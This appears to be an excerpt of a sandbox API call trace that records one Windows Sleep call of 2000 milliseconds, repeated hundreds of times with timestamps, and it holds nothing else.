Sleep (dwMilliseconds=0x7d0) [0247.692] Sleep (dwMilliseconds=0x7d0) [0247.694] Sleep (dwMilliseconds=0x7d0) [0247.701] Sleep (dwMilliseconds=0x7d0) [0247.703] Sleep (dwMilliseconds=0x7d0) [0247.712] Sleep (dwMilliseconds=0x7d0) [0247.719] Sleep (dwMilliseconds=0x7d0) [0247.721] Sleep (dwMilliseconds=0x7d0) [0247.728] Sleep (dwMilliseconds=0x7d0) [0247.729] Sleep (dwMilliseconds=0x7d0) [0247.737] Sleep (dwMilliseconds=0x7d0) [0247.738] Sleep (dwMilliseconds=0x7d0) [0247.746] Sleep (dwMilliseconds=0x7d0) [0247.754] Sleep (dwMilliseconds=0x7d0) [0247.756] Sleep (dwMilliseconds=0x7d0) [0247.764] Sleep (dwMilliseconds=0x7d0) [0247.765] Sleep (dwMilliseconds=0x7d0) [0247.772] Sleep (dwMilliseconds=0x7d0) [0247.774] Sleep (dwMilliseconds=0x7d0) [0247.782] Sleep (dwMilliseconds=0x7d0) [0247.783] Sleep (dwMilliseconds=0x7d0) [0247.795] Sleep (dwMilliseconds=0x7d0) [0247.796] Sleep (dwMilliseconds=0x7d0) [0247.805] Sleep (dwMilliseconds=0x7d0) [0247.808] Sleep (dwMilliseconds=0x7d0) [0247.817] Sleep (dwMilliseconds=0x7d0) [0247.820] Sleep (dwMilliseconds=0x7d0) [0247.826] Sleep (dwMilliseconds=0x7d0) [0247.827] Sleep (dwMilliseconds=0x7d0) [0247.837] Sleep (dwMilliseconds=0x7d0) [0247.838] Sleep (dwMilliseconds=0x7d0) [0247.846] Sleep (dwMilliseconds=0x7d0) [0247.854] Sleep (dwMilliseconds=0x7d0) [0247.862] Sleep (dwMilliseconds=0x7d0) [0247.866] Sleep (dwMilliseconds=0x7d0) [0247.875] Sleep (dwMilliseconds=0x7d0) [0247.883] Sleep (dwMilliseconds=0x7d0) [0247.884] Sleep (dwMilliseconds=0x7d0) [0247.892] Sleep (dwMilliseconds=0x7d0) [0247.901] Sleep (dwMilliseconds=0x7d0) [0247.902] Sleep (dwMilliseconds=0x7d0) [0247.907] Sleep (dwMilliseconds=0x7d0) [0247.910] Sleep (dwMilliseconds=0x7d0) [0247.911] Sleep (dwMilliseconds=0x7d0) [0247.921] Sleep (dwMilliseconds=0x7d0) [0247.923] Sleep (dwMilliseconds=0x7d0) [0247.930] Sleep (dwMilliseconds=0x7d0) [0247.931] Sleep (dwMilliseconds=0x7d0) [0247.939] Sleep (dwMilliseconds=0x7d0) [0247.941] Sleep (dwMilliseconds=0x7d0) [0247.948] Sleep (dwMilliseconds=0x7d0) [0247.949] Sleep (dwMilliseconds=0x7d0) [0247.954] Sleep (dwMilliseconds=0x7d0) [0247.957] Sleep (dwMilliseconds=0x7d0) [0247.958] Sleep (dwMilliseconds=0x7d0) [0247.966] Sleep (dwMilliseconds=0x7d0) [0247.967] Sleep (dwMilliseconds=0x7d0) [0247.975] Sleep (dwMilliseconds=0x7d0) [0247.984] Sleep (dwMilliseconds=0x7d0) [0247.985] Sleep (dwMilliseconds=0x7d0) [0247.992] Sleep (dwMilliseconds=0x7d0) [0247.998] Sleep (dwMilliseconds=0x7d0) [0248.000] Sleep (dwMilliseconds=0x7d0) [0248.001] Sleep (dwMilliseconds=0x7d0) [0248.009] Sleep (dwMilliseconds=0x7d0) [0248.011] Sleep (dwMilliseconds=0x7d0) [0248.023] Sleep (dwMilliseconds=0x7d0) [0248.025] Sleep (dwMilliseconds=0x7d0) [0248.034] Sleep (dwMilliseconds=0x7d0) [0248.042] Sleep (dwMilliseconds=0x7d0) [0248.043] Sleep (dwMilliseconds=0x7d0) [0248.051] Sleep (dwMilliseconds=0x7d0) [0248.052] Sleep (dwMilliseconds=0x7d0) [0248.079] Sleep (dwMilliseconds=0x7d0) [0248.080] Sleep (dwMilliseconds=0x7d0) [0248.087] Sleep (dwMilliseconds=0x7d0) [0248.089] Sleep (dwMilliseconds=0x7d0) [0248.096] Sleep (dwMilliseconds=0x7d0) [0248.097] Sleep (dwMilliseconds=0x7d0) [0248.104] Sleep (dwMilliseconds=0x7d0) [0248.105] Sleep (dwMilliseconds=0x7d0) [0248.112] Sleep (dwMilliseconds=0x7d0) [0248.114] Sleep (dwMilliseconds=0x7d0) [0248.122] Sleep (dwMilliseconds=0x7d0) [0248.129] Sleep (dwMilliseconds=0x7d0) [0248.131] Sleep (dwMilliseconds=0x7d0) [0248.138] Sleep (dwMilliseconds=0x7d0) [0248.140] Sleep (dwMilliseconds=0x7d0) [0248.147] Sleep (dwMilliseconds=0x7d0) [0248.149] Sleep (dwMilliseconds=0x7d0) [0248.151] Sleep (dwMilliseconds=0x7d0) [0248.156] Sleep (dwMilliseconds=0x7d0) [0248.158] Sleep (dwMilliseconds=0x7d0) [0248.165] Sleep (dwMilliseconds=0x7d0) [0248.166] Sleep (dwMilliseconds=0x7d0) [0248.173] Sleep (dwMilliseconds=0x7d0) [0248.174] Sleep (dwMilliseconds=0x7d0) [0248.182] Sleep (dwMilliseconds=0x7d0) [0248.184] Sleep (dwMilliseconds=0x7d0) [0248.191] Sleep (dwMilliseconds=0x7d0) [0248.193] Sleep (dwMilliseconds=0x7d0) [0248.196] Sleep (dwMilliseconds=0x7d0) [0248.200] Sleep (dwMilliseconds=0x7d0) [0248.202] Sleep (dwMilliseconds=0x7d0) [0248.209] Sleep (dwMilliseconds=0x7d0) [0248.349] Sleep (dwMilliseconds=0x7d0) [0248.359] Sleep (dwMilliseconds=0x7d0) [0248.367] Sleep (dwMilliseconds=0x7d0) [0248.368] Sleep (dwMilliseconds=0x7d0) [0248.377] Sleep (dwMilliseconds=0x7d0) [0248.379] Sleep (dwMilliseconds=0x7d0) [0248.387] Sleep (dwMilliseconds=0x7d0) [0248.388] Sleep (dwMilliseconds=0x7d0) [0248.396] Sleep (dwMilliseconds=0x7d0) [0248.397] Sleep (dwMilliseconds=0x7d0) [0248.405] Sleep (dwMilliseconds=0x7d0) [0248.407] Sleep (dwMilliseconds=0x7d0) [0248.414] Sleep (dwMilliseconds=0x7d0) [0248.415] Sleep (dwMilliseconds=0x7d0) [0248.423] Sleep (dwMilliseconds=0x7d0) [0248.432] Sleep (dwMilliseconds=0x7d0) [0248.442] Sleep (dwMilliseconds=0x7d0) [0248.443] Sleep (dwMilliseconds=0x7d0) [0248.451] Sleep (dwMilliseconds=0x7d0) [0248.459] Sleep (dwMilliseconds=0x7d0) [0248.460] Sleep (dwMilliseconds=0x7d0) [0248.467] Sleep (dwMilliseconds=0x7d0) [0248.476] Sleep (dwMilliseconds=0x7d0) [0248.546] Sleep (dwMilliseconds=0x7d0) [0248.548] Sleep (dwMilliseconds=0x7d0) [0248.557] Sleep (dwMilliseconds=0x7d0) [0248.559] Sleep (dwMilliseconds=0x7d0) [0248.567] Sleep (dwMilliseconds=0x7d0) [0248.569] Sleep (dwMilliseconds=0x7d0) [0248.577] Sleep (dwMilliseconds=0x7d0) [0248.579] Sleep (dwMilliseconds=0x7d0) [0248.587] Sleep (dwMilliseconds=0x7d0) [0248.589] Sleep (dwMilliseconds=0x7d0) [0248.591] Sleep (dwMilliseconds=0x7d0) [0248.596] Sleep (dwMilliseconds=0x7d0) [0248.597] Sleep (dwMilliseconds=0x7d0) [0248.605] Sleep (dwMilliseconds=0x7d0) [0248.611] Sleep (dwMilliseconds=0x7d0) [0248.619] Sleep (dwMilliseconds=0x7d0) [0248.620] Sleep (dwMilliseconds=0x7d0) [0248.626] Sleep (dwMilliseconds=0x7d0) [0248.628] Sleep (dwMilliseconds=0x7d0) [0248.634] Sleep (dwMilliseconds=0x7d0) [0248.635] Sleep (dwMilliseconds=0x7d0) [0248.642] Sleep (dwMilliseconds=0x7d0) [0248.644] Sleep (dwMilliseconds=0x7d0) [0248.649] Sleep (dwMilliseconds=0x7d0) [0248.655] Sleep (dwMilliseconds=0x7d0) [0248.656] Sleep (dwMilliseconds=0x7d0) [0248.664] Sleep (dwMilliseconds=0x7d0) [0248.665] Sleep (dwMilliseconds=0x7d0) [0248.681] Sleep (dwMilliseconds=0x7d0) [0248.688] Sleep (dwMilliseconds=0x7d0) [0248.689] Sleep (dwMilliseconds=0x7d0) [0248.695] Sleep (dwMilliseconds=0x7d0) [0248.697] Sleep (dwMilliseconds=0x7d0) [0248.702] Sleep (dwMilliseconds=0x7d0) [0248.704] Sleep (dwMilliseconds=0x7d0) [0248.709] Sleep (dwMilliseconds=0x7d0) [0248.711] Sleep (dwMilliseconds=0x7d0) [0248.716] Sleep (dwMilliseconds=0x7d0) [0248.722] Sleep (dwMilliseconds=0x7d0) [0248.724] Sleep (dwMilliseconds=0x7d0) [0248.729] Sleep (dwMilliseconds=0x7d0) [0248.736] Sleep (dwMilliseconds=0x7d0) [0248.740] Sleep (dwMilliseconds=0x7d0) [0248.743] Sleep (dwMilliseconds=0x7d0) [0248.744] Sleep (dwMilliseconds=0x7d0) [0248.750] Sleep (dwMilliseconds=0x7d0) [0248.757] Sleep (dwMilliseconds=0x7d0) [0248.764] Sleep (dwMilliseconds=0x7d0) [0248.771] Sleep (dwMilliseconds=0x7d0) [0248.773] Sleep (dwMilliseconds=0x7d0) [0248.779] Sleep (dwMilliseconds=0x7d0) [0248.784] Sleep (dwMilliseconds=0x7d0) [0248.786] Sleep (dwMilliseconds=0x7d0) [0248.787] Sleep (dwMilliseconds=0x7d0) [0248.793] Sleep (dwMilliseconds=0x7d0) [0248.800] Sleep (dwMilliseconds=0x7d0) [0248.803] Sleep (dwMilliseconds=0x7d0) [0248.809] Sleep (dwMilliseconds=0x7d0) [0248.810] Sleep (dwMilliseconds=0x7d0) [0248.816] Sleep (dwMilliseconds=0x7d0) [0248.818] Sleep (dwMilliseconds=0x7d0) [0248.823] Sleep (dwMilliseconds=0x7d0) [0248.829] Sleep (dwMilliseconds=0x7d0) [0248.831] Sleep (dwMilliseconds=0x7d0) [0248.840] Sleep (dwMilliseconds=0x7d0) [0248.846] Sleep (dwMilliseconds=0x7d0) [0248.848] Sleep (dwMilliseconds=0x7d0) [0248.853] Sleep (dwMilliseconds=0x7d0) [0248.856] Sleep (dwMilliseconds=0x7d0) [0248.863] Sleep (dwMilliseconds=0x7d0) [0248.864] Sleep (dwMilliseconds=0x7d0) [0248.870] Sleep (dwMilliseconds=0x7d0) [0248.875] Sleep (dwMilliseconds=0x7d0) [0248.876] Sleep (dwMilliseconds=0x7d0) [0248.878] Sleep (dwMilliseconds=0x7d0) [0248.883] Sleep (dwMilliseconds=0x7d0) [0248.885] Sleep (dwMilliseconds=0x7d0) [0248.890] Sleep (dwMilliseconds=0x7d0) [0248.897] Sleep (dwMilliseconds=0x7d0) [0248.899] Sleep (dwMilliseconds=0x7d0) [0248.904] Sleep (dwMilliseconds=0x7d0) [0248.908] Sleep (dwMilliseconds=0x7d0) [0248.915] Sleep (dwMilliseconds=0x7d0) [0248.917] Sleep (dwMilliseconds=0x7d0) [0248.922] Sleep (dwMilliseconds=0x7d0) [0248.924] Sleep (dwMilliseconds=0x7d0) [0248.930] Sleep (dwMilliseconds=0x7d0) [0248.936] Sleep (dwMilliseconds=0x7d0) [0248.938] Sleep (dwMilliseconds=0x7d0) [0248.944] Sleep (dwMilliseconds=0x7d0) [0248.945] Sleep (dwMilliseconds=0x7d0) [0248.951] Sleep (dwMilliseconds=0x7d0) [0248.952] Sleep (dwMilliseconds=0x7d0) [0248.957] Sleep (dwMilliseconds=0x7d0) [0248.959] Sleep (dwMilliseconds=0x7d0) [0248.969] Sleep (dwMilliseconds=0x7d0) [0248.971] Sleep (dwMilliseconds=0x7d0) [0248.973] Sleep (dwMilliseconds=0x7d0) [0248.980] Sleep (dwMilliseconds=0x7d0) [0248.986] Sleep (dwMilliseconds=0x7d0) [0248.988] Sleep (dwMilliseconds=0x7d0) [0248.995] Sleep (dwMilliseconds=0x7d0) [0249.002] Sleep (dwMilliseconds=0x7d0) [0249.003] Sleep (dwMilliseconds=0x7d0) [0249.011] Sleep (dwMilliseconds=0x7d0) [0249.012] Sleep (dwMilliseconds=0x7d0) [0249.014] Sleep (dwMilliseconds=0x7d0) [0249.018] Sleep (dwMilliseconds=0x7d0) [0249.019] Sleep (dwMilliseconds=0x7d0) [0249.025] Sleep (dwMilliseconds=0x7d0) [0249.027] Sleep (dwMilliseconds=0x7d0) [0249.032] Sleep (dwMilliseconds=0x7d0) [0249.034] Sleep (dwMilliseconds=0x7d0) [0249.039] Sleep (dwMilliseconds=0x7d0) [0249.047] Sleep (dwMilliseconds=0x7d0) [0249.053] Sleep (dwMilliseconds=0x7d0) [0249.055] Sleep (dwMilliseconds=0x7d0) [0249.059] Sleep (dwMilliseconds=0x7d0) [0249.061] Sleep (dwMilliseconds=0x7d0) [0249.067] Sleep (dwMilliseconds=0x7d0) [0249.068] Sleep (dwMilliseconds=0x7d0) [0249.074] Sleep (dwMilliseconds=0x7d0) [0249.080] Sleep (dwMilliseconds=0x7d0) [0249.081] Sleep (dwMilliseconds=0x7d0) [0249.086] Sleep (dwMilliseconds=0x7d0) [0249.087] Sleep (dwMilliseconds=0x7d0) [0249.092] Sleep (dwMilliseconds=0x7d0) [0249.094] Sleep (dwMilliseconds=0x7d0) [0249.099] Sleep (dwMilliseconds=0x7d0) [0249.103] Sleep (dwMilliseconds=0x7d0) [0249.106] Sleep (dwMilliseconds=0x7d0) [0249.107] Sleep (dwMilliseconds=0x7d0) [0249.113] Sleep (dwMilliseconds=0x7d0) [0249.114] Sleep (dwMilliseconds=0x7d0) [0249.119] Sleep (dwMilliseconds=0x7d0) [0249.121] Sleep (dwMilliseconds=0x7d0) [0249.126] Sleep (dwMilliseconds=0x7d0) [0249.128] Sleep (dwMilliseconds=0x7d0) [0249.133] Sleep (dwMilliseconds=0x7d0) [0249.139] Sleep (dwMilliseconds=0x7d0) [0249.141] Sleep (dwMilliseconds=0x7d0) [0249.147] Sleep (dwMilliseconds=0x7d0) [0249.148] Sleep (dwMilliseconds=0x7d0) [0249.150] Sleep (dwMilliseconds=0x7d0) [0249.154] Sleep (dwMilliseconds=0x7d0) [0249.155] Sleep (dwMilliseconds=0x7d0) [0249.161] Sleep (dwMilliseconds=0x7d0) [0249.162] Sleep (dwMilliseconds=0x7d0) [0249.167] Sleep (dwMilliseconds=0x7d0) [0249.185] Sleep (dwMilliseconds=0x7d0) [0249.191] Sleep (dwMilliseconds=0x7d0) [0249.192] Sleep (dwMilliseconds=0x7d0) [0249.198] Sleep (dwMilliseconds=0x7d0) [0249.204] Sleep (dwMilliseconds=0x7d0) [0249.205] Sleep (dwMilliseconds=0x7d0) [0249.210] Sleep (dwMilliseconds=0x7d0) [0249.217] Sleep (dwMilliseconds=0x7d0) [0249.218] Sleep (dwMilliseconds=0x7d0) [0249.223] Sleep (dwMilliseconds=0x7d0) [0249.224] Sleep (dwMilliseconds=0x7d0) [0249.230] Sleep (dwMilliseconds=0x7d0) [0249.231] Sleep (dwMilliseconds=0x7d0) [0249.237] Sleep (dwMilliseconds=0x7d0) [0249.238] Sleep (dwMilliseconds=0x7d0) [0249.245] Sleep (dwMilliseconds=0x7d0) [0249.253] Sleep (dwMilliseconds=0x7d0) [0249.254] Sleep (dwMilliseconds=0x7d0) [0249.256] Sleep (dwMilliseconds=0x7d0) [0249.260] Sleep (dwMilliseconds=0x7d0) [0249.261] Sleep (dwMilliseconds=0x7d0) [0249.267] Sleep (dwMilliseconds=0x7d0) [0249.268] Sleep (dwMilliseconds=0x7d0) [0249.274] Sleep (dwMilliseconds=0x7d0) [0249.280] Sleep (dwMilliseconds=0x7d0) [0249.281] Sleep (dwMilliseconds=0x7d0) [0249.288] Sleep (dwMilliseconds=0x7d0) [0249.289] Sleep (dwMilliseconds=0x7d0) [0249.298] Sleep (dwMilliseconds=0x7d0) [0249.299] Sleep (dwMilliseconds=0x7d0) [0249.300] Sleep (dwMilliseconds=0x7d0) [0249.305] Sleep (dwMilliseconds=0x7d0) [0249.307] Sleep (dwMilliseconds=0x7d0) [0249.314] Sleep (dwMilliseconds=0x7d0) [0249.315] Sleep (dwMilliseconds=0x7d0) [0249.362] Sleep (dwMilliseconds=0x7d0) [0249.375] Sleep (dwMilliseconds=0x7d0) [0249.376] Sleep (dwMilliseconds=0x7d0) [0249.384] Sleep (dwMilliseconds=0x7d0) [0249.385] Sleep (dwMilliseconds=0x7d0) [0249.393] Sleep (dwMilliseconds=0x7d0) [0249.394] Sleep (dwMilliseconds=0x7d0) [0249.402] Sleep (dwMilliseconds=0x7d0) [0249.403] Sleep (dwMilliseconds=0x7d0) [0249.408] Sleep (dwMilliseconds=0x7d0) [0249.414] Sleep (dwMilliseconds=0x7d0) [0249.423] Sleep (dwMilliseconds=0x7d0) [0249.429] Sleep (dwMilliseconds=0x7d0) [0249.431] Sleep (dwMilliseconds=0x7d0) [0249.436] Sleep (dwMilliseconds=0x7d0) [0249.438] Sleep (dwMilliseconds=0x7d0) [0249.445] Sleep (dwMilliseconds=0x7d0) [0249.447] Sleep (dwMilliseconds=0x7d0) [0249.452] Sleep (dwMilliseconds=0x7d0) [0249.453] Sleep (dwMilliseconds=0x7d0) [0249.459] Sleep (dwMilliseconds=0x7d0) [0249.467] Sleep (dwMilliseconds=0x7d0) [0249.468] Sleep (dwMilliseconds=0x7d0) [0249.473] Sleep (dwMilliseconds=0x7d0) [0249.475] Sleep (dwMilliseconds=0x7d0) [0249.480] Sleep (dwMilliseconds=0x7d0) [0249.481] Sleep (dwMilliseconds=0x7d0) [0249.487] Sleep (dwMilliseconds=0x7d0) [0249.488] Sleep (dwMilliseconds=0x7d0) [0249.494] Sleep (dwMilliseconds=0x7d0) [0249.500] Sleep (dwMilliseconds=0x7d0) [0249.501] Sleep (dwMilliseconds=0x7d0) [0249.505] Sleep (dwMilliseconds=0x7d0) [0249.507] Sleep (dwMilliseconds=0x7d0) [0249.509] Sleep (dwMilliseconds=0x7d0) [0249.515] Sleep (dwMilliseconds=0x7d0) [0249.517] Sleep (dwMilliseconds=0x7d0) [0249.523] Sleep (dwMilliseconds=0x7d0) [0249.529] Sleep (dwMilliseconds=0x7d0) [0249.535] Sleep (dwMilliseconds=0x7d0) [0249.536] Sleep (dwMilliseconds=0x7d0) [0249.542] Sleep (dwMilliseconds=0x7d0) [0249.543] Sleep (dwMilliseconds=0x7d0) [0249.551] Sleep (dwMilliseconds=0x7d0) [0249.552] Sleep (dwMilliseconds=0x7d0) [0249.559] Sleep (dwMilliseconds=0x7d0) [0249.561] Sleep (dwMilliseconds=0x7d0) [0249.567] Sleep (dwMilliseconds=0x7d0) [0249.569] Sleep (dwMilliseconds=0x7d0) [0249.575] Sleep (dwMilliseconds=0x7d0) [0249.576] Sleep (dwMilliseconds=0x7d0) [0249.582] Sleep (dwMilliseconds=0x7d0) [0249.583] Sleep (dwMilliseconds=0x7d0) [0249.588] Sleep (dwMilliseconds=0x7d0) [0249.590] Sleep (dwMilliseconds=0x7d0) [0249.596] Sleep (dwMilliseconds=0x7d0) [0249.598] Sleep (dwMilliseconds=0x7d0) [0249.602] Sleep (dwMilliseconds=0x7d0) [0249.603] Sleep (dwMilliseconds=0x7d0) [0249.609] Sleep (dwMilliseconds=0x7d0) [0249.610] Sleep (dwMilliseconds=0x7d0) [0249.616] Sleep (dwMilliseconds=0x7d0) [0249.617] Sleep (dwMilliseconds=0x7d0) [0249.624] Sleep (dwMilliseconds=0x7d0) [0249.625] Sleep (dwMilliseconds=0x7d0) [0249.634] Sleep (dwMilliseconds=0x7d0) [0249.641] Sleep (dwMilliseconds=0x7d0) [0249.642] Sleep (dwMilliseconds=0x7d0) [0249.651] Sleep (dwMilliseconds=0x7d0) [0249.652] Sleep (dwMilliseconds=0x7d0) [0249.662] Sleep (dwMilliseconds=0x7d0) [0249.668] Sleep (dwMilliseconds=0x7d0) [0249.675] Sleep (dwMilliseconds=0x7d0) [0249.676] Sleep (dwMilliseconds=0x7d0) [0249.682] Sleep (dwMilliseconds=0x7d0) [0249.683] Sleep (dwMilliseconds=0x7d0) [0249.687] Sleep (dwMilliseconds=0x7d0) [0249.690] Sleep (dwMilliseconds=0x7d0) [0249.698] Sleep (dwMilliseconds=0x7d0) [0249.699] Sleep (dwMilliseconds=0x7d0) [0249.705] Sleep (dwMilliseconds=0x7d0) [0249.706] Sleep (dwMilliseconds=0x7d0) [0249.711] Sleep (dwMilliseconds=0x7d0) [0249.713] Sleep (dwMilliseconds=0x7d0) [0249.719] Sleep (dwMilliseconds=0x7d0) [0249.720] Sleep (dwMilliseconds=0x7d0) [0249.726] Sleep (dwMilliseconds=0x7d0) [0249.727] Sleep (dwMilliseconds=0x7d0) [0249.732] Sleep (dwMilliseconds=0x7d0) [0249.733] Sleep (dwMilliseconds=0x7d0) [0249.740] Sleep (dwMilliseconds=0x7d0) [0249.741] Sleep (dwMilliseconds=0x7d0) [0249.747] Sleep (dwMilliseconds=0x7d0) [0249.754] Sleep (dwMilliseconds=0x7d0) [0249.760] Sleep (dwMilliseconds=0x7d0) [0249.763] Sleep (dwMilliseconds=0x7d0) [0249.769] Sleep (dwMilliseconds=0x7d0) [0249.770] Sleep (dwMilliseconds=0x7d0) [0249.776] Sleep (dwMilliseconds=0x7d0) [0249.777] Sleep (dwMilliseconds=0x7d0) [0249.784] Sleep (dwMilliseconds=0x7d0) [0249.791] Sleep (dwMilliseconds=0x7d0) [0249.793] Sleep (dwMilliseconds=0x7d0) [0249.799] Sleep (dwMilliseconds=0x7d0) [0249.800] Sleep (dwMilliseconds=0x7d0) [0249.805] Sleep (dwMilliseconds=0x7d0) [0249.807] Sleep (dwMilliseconds=0x7d0) [0249.813] Sleep (dwMilliseconds=0x7d0) [0249.814] Sleep (dwMilliseconds=0x7d0) [0249.821] Sleep (dwMilliseconds=0x7d0) [0249.831] Sleep (dwMilliseconds=0x7d0) [0249.840] Sleep (dwMilliseconds=0x7d0) [0249.842] Sleep (dwMilliseconds=0x7d0) [0249.851] Sleep (dwMilliseconds=0x7d0) [0249.860] Sleep (dwMilliseconds=0x7d0) [0249.862] Sleep (dwMilliseconds=0x7d0) [0249.866] Sleep (dwMilliseconds=0x7d0) [0249.871] Sleep (dwMilliseconds=0x7d0) [0249.872] Sleep (dwMilliseconds=0x7d0) [0249.881] Sleep (dwMilliseconds=0x7d0) [0249.882] Sleep (dwMilliseconds=0x7d0) [0249.890] Sleep (dwMilliseconds=0x7d0) [0249.892] Sleep (dwMilliseconds=0x7d0) [0249.900] Sleep (dwMilliseconds=0x7d0) [0249.901] Sleep (dwMilliseconds=0x7d0) [0249.910] Sleep (dwMilliseconds=0x7d0) [0249.918] Sleep (dwMilliseconds=0x7d0) [0249.927] Sleep (dwMilliseconds=0x7d0) [0249.929] Sleep (dwMilliseconds=0x7d0) [0249.936] Sleep (dwMilliseconds=0x7d0) [0249.938] Sleep (dwMilliseconds=0x7d0) [0249.947] Sleep (dwMilliseconds=0x7d0) [0249.954] Sleep (dwMilliseconds=0x7d0) [0249.957] Sleep (dwMilliseconds=0x7d0) [0249.959] Sleep (dwMilliseconds=0x7d0) [0249.968] Sleep (dwMilliseconds=0x7d0) [0249.980] Sleep (dwMilliseconds=0x7d0) [0249.989] Sleep (dwMilliseconds=0x7d0) [0249.991] Sleep (dwMilliseconds=0x7d0) [0249.998] Sleep (dwMilliseconds=0x7d0) [0250.003] Sleep (dwMilliseconds=0x7d0) [0250.006] Sleep (dwMilliseconds=0x7d0) [0250.013] Sleep (dwMilliseconds=0x7d0) [0250.014] Sleep (dwMilliseconds=0x7d0) [0250.020] Sleep (dwMilliseconds=0x7d0) [0250.021] Sleep (dwMilliseconds=0x7d0) [0250.027] Sleep (dwMilliseconds=0x7d0) [0250.028] Sleep (dwMilliseconds=0x7d0) [0250.034] Sleep (dwMilliseconds=0x7d0) [0250.036] Sleep (dwMilliseconds=0x7d0) [0250.041] Sleep (dwMilliseconds=0x7d0) [0250.047] Sleep (dwMilliseconds=0x7d0) [0250.054] Sleep (dwMilliseconds=0x7d0) [0250.058] Sleep (dwMilliseconds=0x7d0) [0250.065] Sleep (dwMilliseconds=0x7d0) [0250.071] Sleep (dwMilliseconds=0x7d0) [0250.078] Sleep (dwMilliseconds=0x7d0) [0250.086] Sleep (dwMilliseconds=0x7d0) [0250.094] Sleep (dwMilliseconds=0x7d0) [0250.095] Sleep (dwMilliseconds=0x7d0) [0250.099] Sleep (dwMilliseconds=0x7d0) [0250.101] Sleep (dwMilliseconds=0x7d0) [0250.107] Sleep (dwMilliseconds=0x7d0) [0250.108] Sleep (dwMilliseconds=0x7d0) [0250.114] Sleep (dwMilliseconds=0x7d0) [0250.115] Sleep (dwMilliseconds=0x7d0) [0250.120] Sleep (dwMilliseconds=0x7d0) [0250.121] Sleep (dwMilliseconds=0x7d0) [0250.127] Sleep (dwMilliseconds=0x7d0) [0250.135] Sleep (dwMilliseconds=0x7d0) [0250.140] Sleep (dwMilliseconds=0x7d0) [0250.141] Sleep (dwMilliseconds=0x7d0) [0250.144] Sleep (dwMilliseconds=0x7d0) [0250.147] Sleep (dwMilliseconds=0x7d0) [0250.153] Sleep (dwMilliseconds=0x7d0) [0250.155] Sleep (dwMilliseconds=0x7d0) [0250.162] Sleep (dwMilliseconds=0x7d0) [0250.209] Sleep (dwMilliseconds=0x7d0) [0250.216] Sleep (dwMilliseconds=0x7d0) [0250.217] Sleep (dwMilliseconds=0x7d0) [0250.223] Sleep (dwMilliseconds=0x7d0) [0250.224] Sleep (dwMilliseconds=0x7d0) [0250.231] Sleep (dwMilliseconds=0x7d0) [0250.232] Sleep (dwMilliseconds=0x7d0) [0250.238] Sleep (dwMilliseconds=0x7d0) [0250.245] Sleep (dwMilliseconds=0x7d0) [0250.246] Sleep (dwMilliseconds=0x7d0) [0250.252] Sleep (dwMilliseconds=0x7d0) [0250.259] Sleep (dwMilliseconds=0x7d0) [0250.261] Sleep (dwMilliseconds=0x7d0) [0250.268] Sleep (dwMilliseconds=0x7d0) [0250.269] Sleep (dwMilliseconds=0x7d0) [0250.270] Sleep (dwMilliseconds=0x7d0) [0250.275] Sleep (dwMilliseconds=0x7d0) [0250.276] Sleep (dwMilliseconds=0x7d0) [0250.282] Sleep (dwMilliseconds=0x7d0) [0250.291] Sleep (dwMilliseconds=0x7d0) [0250.297] Sleep (dwMilliseconds=0x7d0) [0250.298] Sleep (dwMilliseconds=0x7d0) [0250.304] Sleep (dwMilliseconds=0x7d0) [0250.305] Sleep (dwMilliseconds=0x7d0) [0250.312] Sleep (dwMilliseconds=0x7d0) [0250.313] Sleep (dwMilliseconds=0x7d0) [0250.316] Sleep (dwMilliseconds=0x7d0) [0250.319] Sleep (dwMilliseconds=0x7d0) [0250.320] Sleep (dwMilliseconds=0x7d0) [0250.326] Sleep (dwMilliseconds=0x7d0) [0250.332] Sleep (dwMilliseconds=0x7d0) [0250.334] Sleep (dwMilliseconds=0x7d0) [0250.340] Sleep (dwMilliseconds=0x7d0) [0250.346] Sleep (dwMilliseconds=0x7d0) [0250.362] Sleep (dwMilliseconds=0x7d0) [0250.363] Sleep (dwMilliseconds=0x7d0) [0250.368] Sleep (dwMilliseconds=0x7d0) [0250.371] Sleep (dwMilliseconds=0x7d0) [0250.372] Sleep (dwMilliseconds=0x7d0) [0250.379] Sleep (dwMilliseconds=0x7d0) [0250.380] Sleep (dwMilliseconds=0x7d0) [0250.386] Sleep (dwMilliseconds=0x7d0) [0250.387] Sleep (dwMilliseconds=0x7d0) [0250.396] Sleep (dwMilliseconds=0x7d0) [0250.397] Sleep (dwMilliseconds=0x7d0) [0250.405] Sleep (dwMilliseconds=0x7d0) [0250.406] Sleep (dwMilliseconds=0x7d0) [0250.412] Sleep (dwMilliseconds=0x7d0) [0250.414] Sleep (dwMilliseconds=0x7d0) [0250.422] Sleep (dwMilliseconds=0x7d0) [0250.430] Sleep (dwMilliseconds=0x7d0) [0250.432] Sleep (dwMilliseconds=0x7d0) [0250.439] Sleep (dwMilliseconds=0x7d0) [0250.440] Sleep (dwMilliseconds=0x7d0) [0250.448] Sleep (dwMilliseconds=0x7d0) [0250.449] Sleep (dwMilliseconds=0x7d0) [0250.456] Sleep (dwMilliseconds=0x7d0) [0250.457] Sleep (dwMilliseconds=0x7d0) [0250.460] Sleep (dwMilliseconds=0x7d0) [0250.463] Sleep (dwMilliseconds=0x7d0) [0250.464] Sleep (dwMilliseconds=0x7d0) [0250.473] Sleep (dwMilliseconds=0x7d0) [0250.475] Sleep (dwMilliseconds=0x7d0) [0250.482] Sleep (dwMilliseconds=0x7d0) [0250.484] Sleep (dwMilliseconds=0x7d0) [0250.491] Sleep (dwMilliseconds=0x7d0) [0250.498] Sleep (dwMilliseconds=0x7d0) [0250.506] Sleep (dwMilliseconds=0x7d0) [0250.508] Sleep (dwMilliseconds=0x7d0) [0250.510] Sleep (dwMilliseconds=0x7d0) [0250.514] Sleep (dwMilliseconds=0x7d0) [0250.516] Sleep (dwMilliseconds=0x7d0) [0250.523] Sleep (dwMilliseconds=0x7d0) [0250.530] Sleep (dwMilliseconds=0x7d0) [0250.531] Sleep (dwMilliseconds=0x7d0) [0250.537] Sleep (dwMilliseconds=0x7d0) [0250.538] Sleep (dwMilliseconds=0x7d0) [0250.544] Sleep (dwMilliseconds=0x7d0) [0250.545] Sleep (dwMilliseconds=0x7d0) [0250.552] Sleep (dwMilliseconds=0x7d0) [0250.554] Sleep (dwMilliseconds=0x7d0) [0250.558] Sleep (dwMilliseconds=0x7d0) [0250.560] Sleep (dwMilliseconds=0x7d0) [0250.567] Sleep (dwMilliseconds=0x7d0) [0250.568] Sleep (dwMilliseconds=0x7d0) [0250.574] Sleep (dwMilliseconds=0x7d0) [0250.575] Sleep (dwMilliseconds=0x7d0) [0250.581] Sleep (dwMilliseconds=0x7d0) 